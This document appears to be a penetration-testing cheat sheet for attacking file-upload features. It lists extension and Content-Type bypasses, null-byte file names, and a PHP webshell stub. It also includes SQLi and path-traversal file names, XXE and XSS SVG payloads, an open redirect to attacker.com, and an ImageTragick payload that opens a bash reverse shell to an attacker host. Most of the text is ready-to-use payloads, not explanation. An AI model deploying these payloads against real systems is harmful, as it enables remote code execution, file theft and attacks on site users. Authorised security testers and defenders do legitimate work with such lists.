File upload
# File name validation
# extension blacklisted:
PHP: .phtm, phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
ASP: .asp, .aspx, .cer, .asa
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm
Using random capitalization: .pHp, .pHP5, .PhAr
pht,phpt,phtml,php3,php4,php5,php6,php7,phar,pgif,phtm,phps,shtml,phar,pgif,inc
# extension whitelisted (file-name parsing inconsistency tests):
file.jpg.php
file.php.jpg
file.php.blah123jpg
file.php%00.jpg
file.php\x00.jpg
file.php%00
file.php%20
file.php%0d%0a.jpg
file.php.....
file.php/
file.php.\
file.
.html
# Content type bypass
- Preserve the file name, but change the Content-Type header
Content-Type: image/jpeg, image/gif, image/png
# Content length:
# Minimal PHP test payload:
<?='$_GET[x]'?>
# Impact by extension
asp, aspx, php5, php, php3: webshell, rce
svg: stored xss, ssrf, xxe
gif: stored xss, ssrf
csv: csv injection
xml: xxe
avi: lfi, ssrf
html, js: html injection, xss, open redirect
png, jpeg: pixel flood attack (DoS)
zip: rce via lfi, dos
pdf, pptx: ssrf, blind xxe
# Path traversal
../../etc/passwd/logo.png
../../../logo.png
# SQLi
'sleep(10).jpg
sleep(10)-- -.jpg
# Command injection
; sleep 10;
# ImageTragick
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
# XXE .svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>
# XSS svg
<svg onload=alert(document.comain)>.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
# Open redirect svg
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='https://attacker.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
# Filter Bypassing Techniques
# Upload an ASP file using the .cer or .asa extension (IIS on Windows)
# Upload an .eml file when Content-Type = text/HTML
# Inject a null byte into the file name: shell.php%001.jpg
# Check for .svg file upload; stored XSS can be achieved using an XML payload
# Use a file name such as ../../logo.png or ../../etc/passwd/logo.png to test for directory traversal via the uploaded file name
# Upload an oversized image file to test for DoS.
# (magic number) Upload shell.php, change Content-Type to image/gif and start the file content with GIF89a; this defeats checks that only inspect the file signature.
# If the web app allows zip upload, rename the file to pwd.jpg, because the developer may be handling it via a shell command
# Upload a file named 'sleep(10).jpg; you may achieve SQL injection if the image name is saved directly to the DB.
# Advanced bypassing techniques
# ImageTragick (ImageMagick) references:
https://mukarramkhalid.com/imagemagick-imagetragick-exploit/
https://github.com/neex/gifoeb
# File upload testing tool
https://github.com/almandin/fuxploider
python3 fuxploider.py --url https://example.com --not-regex "wrong file type"